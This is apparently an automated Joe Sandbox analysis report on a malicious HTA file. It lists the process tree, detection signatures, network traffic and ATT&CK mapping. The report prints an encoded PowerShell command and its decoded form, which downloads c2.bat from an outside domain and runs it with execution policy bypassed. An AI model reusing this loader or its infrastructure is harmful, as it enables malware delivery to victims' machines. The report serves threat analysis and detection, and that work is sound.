

Windows Analysis Report
c2.hta

Overview

General Information

Sample name: c2.hta
Analysis ID: 1589450
MD5: 18f2197e51378d2fc3f6d250aca9a459
SHA1: b58941e542d1c4ec72c3ca925794e1de9c5d0338
SHA256: 525d22cf62c199246896579367e361fae0dc4e80ad76076965546f7647a9c491
Tags: hta, user-abuse_ch

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 6980 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 5064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand [base64 payload; full value listed under System Summary] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Sigma rule matches on "Process started" (five rule matches on the same powershell.exe creation event; rule authors as listed in the report):
  • pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
  • Michael Haag
  • frack113
  • frack113
  • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Matched event data:
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA
  CommandLine: (identical to Command)
  CommandLine|base64offset|contains: L^rbs'2
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta"
  ParentImage: C:\Windows\SysWOW64\mshta.exe
  ParentProcessId: 6980
  ParentProcessName: mshta.exe
  ProcessCommandLine: "C:\Windows\System32\WindowsP
Suricata alert:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-12T15:36:16.173975+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49732 | 193.26.115.39 | 443 | TCP



AV Detection

Source: https://candwfarmsllc.com/c2.bat | Avira URL Cloud: Label: malware
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 92.4% probability
Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1724014586.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb\ source: powershell.exe, 00000002.00000002.1729801596.00000000073F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdbJN source: powershell.exe, 00000002.00000002.1730075991.000000000745A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdb%N; source: powershell.exe, 00000002.00000002.1730075991.000000000745A000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox View | IP Address: 193.26.115.39
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 193.26.115.39:443
Source: global traffic | HTTP traffic detected:
  GET /c2.bat HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: candwfarmsllc.com
  Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1724014586.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro.
Source: powershell.exe, 00000002.00000002.1730075991.000000000745A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1725181510.0000000004A95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1725181510.0000000004B19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://candwfarmsllc.com/c2.bat
Source: powershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://candwfarmsllc.com/c2.bat=
Source: powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://candwfarmsllc.com/c2.bat=https://candwfarmsllc.com/c2.bat
Source: powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1725181510.000000000516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1725181510.0000000004B13000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/W2.pdf
Source: powershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1725181510.0000000004B13000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zip
Source: powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_047AA3EC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_047AAF28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_047A2697
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_047A205D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_047A0BD5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_047AB9ED
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: mal68.evad.winHTA@4/3@1/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsz3rn25.k5e.ps1
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand [base64 payload; full value listed under System Summary]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe | Sections loaded: iertutil.dll, wldp.dll, mshtml.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, cryptbase.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, windows.storage.dll, propsys.dll, msimtf.dll, dxgi.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, resourcepolicyclient.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, msls31.dll, d2d1.dll, dwrite.dll, d3d10warp.dll, dxcore.dll, mpr.dll, scrrun.dll, sxs.dll, msasn1.dll, gpapi.dll, edputil.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, jscript9.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_047A1DC3 pushad ; ret 2_2_047A1DE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_047A1D93 pushad ; ret 2_2_047A1DA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_047A1D83 pushad ; ret 2_2_047A1D92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_047A3805 push ss; ret 2_2_047A380A
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5887
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2148
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3752 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4340 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3060 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6692 Thread sleep time: -922337203685477s >= -30000s
Source: mshta.exe, 00000000.00000003.1734876931.0000000003316000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000000.00000003.1734876931.0000000003316000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000002.00000002.1729801596.00000000073FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand 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
Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;https://candwfarmsllc.com/c2.bat='https://candwfarmsllc.com/c2.bat';C:\Users\asaol\AppData\Local\Temp\c2.bat=C:\Users\asaol\AppData\Local\Temp + '\c2.bat';Invoke-WebRequest -Uri https://candwfarmsllc.com/c2.bat -OutFile C:\Users\asaol\AppData\Local\Temp\c2.bat;Start-Process -FilePath C:\Users\asaol\AppData\Local\Temp\c2.bat -NoNewWindow
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -noprofile -encodedcommand wwboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0ae0ayqbuageazwblahiaxqa6adoauwblagmadqbyagkadab5afaacgbvahqabwbjag8abaagad0aiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamga7aa0acgboahqadabwahmaogavac8aywbhag4azab3agyayqbyag0acwbsagwaywauagmabwbtac8aywayac4aygbhahqapqanaggadab0ahaacwa6ac8alwbjageabgbkahcazgbhahiabqbzagwababjac4aywbvag0alwbjadialgbiageadaanadsadqakaemaogbcafuacwblahiacwbcageacwbhag8ababcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaywayac4aygbhahqapqbdadoaxabvahmazqbyahmaxabhahmayqbvagwaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acaagacsaiaanafwaywayac4aygbhahqajwa7aa0acgbjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaaaab0ahqacabzadoalwavagmayqbuagqadwbmageacgbtahmababsagmalgbjag8abqavagmamgauagiayqb0acaalqbpahuadabgagkabablacaaqwa6afwavqbzaguacgbzafwayqbzageabwbsafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxabjadialgbiageadaa7aa0acgbtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiabdadoaxabvahmazqbyahmaxabhahmayqbvagwaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcagmamgauagiayqb0acaalqboag8atgblahcavwbpag4azabvahca
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Command and Scripting Interpreter; 2 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Source | Detection | Scanner | Label | Link
c2.hta | 11% | ReversingLabs | Win32.Trojan.Generic |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://candwfarmsllc.com/c2.bat | 100% | Avira URL Cloud | malware |
https://candwfarmsllc.com/c2.bat=https://candwfarmsllc.com/c2.bat | 0% | Avira URL Cloud | safe |
http://candwfarmsllc.com | 0% | Avira URL Cloud | safe |
http://crl.micro. | 0% | Avira URL Cloud | safe |
https://candwfarmsllc.com/c2.bat= | 0% | Avira URL Cloud | safe |
https://candwfarmsllc.com | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
candwfarmsllc.com | 193.26.115.39 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://candwfarmsllc.com/c2.bat | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.micro. | powershell.exe, 00000002.00000002.1724014586.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://candwfarmsllc.com | powershell.exe, 00000002.00000002.1725181510.0000000004A95000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://candwfarmsllc.com/c2.bat= | powershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zip | powershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1725181510.0000000004B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://myguyapp.com/W2.pdf | powershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1725181510.0000000004B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | powershell.exe, 00000002.00000002.1730075991.000000000745A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000002.1725181510.000000000516D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://candwfarmsllc.com | powershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://candwfarmsllc.com/c2.bat=https://candwfarmsllc.com/c2.bat | powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
193.26.115.39 | candwfarmsllc.com | Netherlands | 46261 | QUICKPACKETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589450
Start date and time: 2025-01-12 15:35:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: c2.hta
Detection: MAL
Classification: mal68.evad.winHTA@4/3@1/1
